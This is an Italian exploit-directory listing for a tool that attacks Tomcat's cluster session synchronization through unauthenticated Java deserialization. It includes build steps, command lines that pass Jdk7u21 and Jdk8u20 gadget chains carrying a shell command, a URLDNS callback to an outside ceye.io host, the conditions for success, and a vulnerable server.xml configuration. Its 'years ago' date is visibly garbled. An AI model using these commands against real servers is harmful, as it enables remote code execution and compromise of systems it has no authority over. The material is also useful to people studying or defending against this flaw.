Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
tomcat-cluster-session-sync-exp — Quando Tomcat utilizza la funzionalità integrata di sincronizzazione delle sessioni, una configurazione non sicura (senza l'uso di EncryptInterceptor) causa una vulnerabilità di deserializzazione. Tramite pacchetti appositamente costruiti, è possibile attaccare i server che utilizzano la funzionalità di sincronizzazione delle sessioni integrata di Tomcat. PS: questa non è la CVE-2020-9484; la 9484 è una vulnerabilità relativa alla persistenza delle sessioni, mentre questa riguarda la sincronizzazione del cluster delle sessioni! | Kitploit
Strumenti/GitHubGitHub/threedr3am/tomcat-cluster-session-sync-exp
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubthreedr3am/tomcat-cluster-session-sync-exp

tomcat-cluster-session-sync-exp

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

214376 anni faRevisionato da Kitploit

Quando Tomcat utilizza la funzionalità integrata di sincronizzazione delle sessioni, una configurazione non sicura (senza l'uso di EncryptInterceptor) causa una vulnerabilità di deserializzazione. Tramite pacchetti appositamente costruiti, è possibile attaccare i server che utilizzano la funzionalità di sincronizzazione delle sessioni integrata di Tomcat. PS: questa non è la CVE-2020-9484; la 9484 è una vulnerabilità relativa alla persistenza delle sessioni, mentre questa riguarda la sincronizzazione del cluster delle sessioni!

Condividi

Lo strumento è destinato esclusivamente alla ricerca di sicurezza e all'auto-verifica interna; è vietato utilizzarlo per lanciare attacchi illegali. Le conseguenze derivanti da un uso improprio sono a carico dell'utente.

Exploit per la sincronizzazione di sessione del cluster tomcat

Questa è una vulnerabilità di deserializzazione causata da una configurazione non sicura (senza EncryptInterceptor) quando tomcat utilizza la funzionalità di sincronizzazione delle sessioni integrata. Tramite pacchetti appositamente costruiti, è possibile attaccare i server che utilizzano la sincronizzazione delle sessioni integrata di tomcat.

Utilizzo

Per prima cosa compilare il pacchetto jar:

root@kitploit:~
mvn clean compile assembly:assembly

Il pacchetto jar generato si trova nella directory target

Utilizzo, esempio:

root@kitploit:~
java -jar tomcat-cluster-session-sync-exp-1.0-SNAPSHOT-jar-with-dependencies.jar 127.0.0.1 5000 Jdk7u21 "/bin/bash", "-c", "/System/Applications/Calculator.app/Contents/MacOS/Calculator"
java -jar tomcat-cluster-session-sync-exp-1.0-SNAPSHOT-jar-with-dependencies.jar 127.0.0.1 5000 Jdk8u20 "/bin/bash", "-c", "/System/Applications/Calculator.app/Contents/MacOS/Calculator"
java -jar tomcat-cluster-session-sync-exp-1.0-SNAPSHOT-jar-with-dependencies.jar 127.0.0.1 5000 URLDNS "http://tomcat.xxxxx.ceye.io"

Condizioni

  1. tomcat ha la sincronizzazione delle sessioni abilitata e non è configurato EncryptInterceptor
  2. versione di JDK inferiore a JDK8u20, JDK7u21 (non sono sicuro che sia corretto)
  3. l'endpoint di sincronizzazione è accessibile (di solito rete interna)

Configurazione della sincronizzazione di sessione di tomcat

(conf/server.xml):

root@kitploit:~
<Server>
    ...
    
    <Service>
        ...
        
        <Engine>
            ...
            
            <Cluster className="org.apache.catalina.ha.tcp.SimpleTcpCluster"
                    channelSendOptions="6">
            
                    <Manager className="org.apache.catalina.ha.session.BackupManager"
                      expireSessionsOnShutdown="false"
                      notifyListenersOnReplication="true"
                      mapSendOptions="6"/>
            
            
                    <Channel className="org.apache.catalina.tribes.group.GroupChannel">
                      <Membership className="org.apache.catalina.tribes.membership.McastService"
                        address="228.0.0.4"
                        port="45564"
                        frequency="500"
                        dropTime="3000"/>
                      <Receiver className="org.apache.catalina.tribes.transport.nio.NioReceiver"
                        address="123.123.123.123"
                        port="5000"
                        selectorTimeout="100"
                        maxThreads="6"/>
            
                      <Sender className="org.apache.catalina.tribes.transport.ReplicationTransmitter">
                        <Transport className="org.apache.catalina.tribes.transport.nio.PooledParallelSender"/>
                      </Sender>
                    </Channel>
            
                    <Valve className="org.apache.catalina.ha.tcp.ReplicationValve"
                      filter=".*\.gif;.*\.js;.*\.jpg;.*\.png;.*\.htm;.*\.html;.*\.css;.*\.txt;"/>
            
                    <Deployer className="org.apache.catalina.ha.deploy.FarmWarDeployer"
                      tempDir="/tmp/war-temp/"
                      deployDir="/tmp/war-deploy/"
                      watchDir="/tmp/war-listen/"
                      watchEnabled="false"/>
            
                    <ClusterListener className="org.apache.catalina.ha.session.ClusterSessionListener"/>
            </Cluster>
        </Engine>
  </Service>
</Server>
Scarica lo strumento